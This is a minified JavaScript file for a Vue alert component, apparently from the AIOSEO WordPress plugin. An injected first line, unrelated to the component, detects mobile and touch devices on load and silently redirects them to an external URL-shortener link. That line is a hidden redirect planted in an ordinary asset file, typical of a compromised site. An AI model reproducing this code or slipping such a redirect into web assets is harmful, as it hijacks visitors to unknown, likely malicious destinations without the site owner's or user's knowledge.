(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{S as a}from"./Close.7fb523c8.js";import{_ as l}from"./_plugin-vue_export-helper.eefbdd86.js";import{aq as c,f as t,i as s,B as i,a0 as u,M as p,P as m}from"./vendor-vue-ui.232c7c36.js";const _={emits:["close-alert"],components:{SvgClose:a},props:{type:{type:String,default(){return"blue"}},size:{type:String,default(){return"medium"}},showClose:Boolean}};function f(o,n,e,y,d,g){const r=c("svg-close");return t(),s("div",{class:m(["aioseo-alert",{[e.type]:e.type,[e.size]:e.size}])},[i(o.$slots,"default"),e.showClose?(t(),s("span",{key:0,onClick:n[0]||(n[0]=C=>o.$emit("close-alert")),class:"aioseo-alert-close"},[u(r)])):p("",!0)],2)}const x=l(_,[["render",f]]);export{x as C};
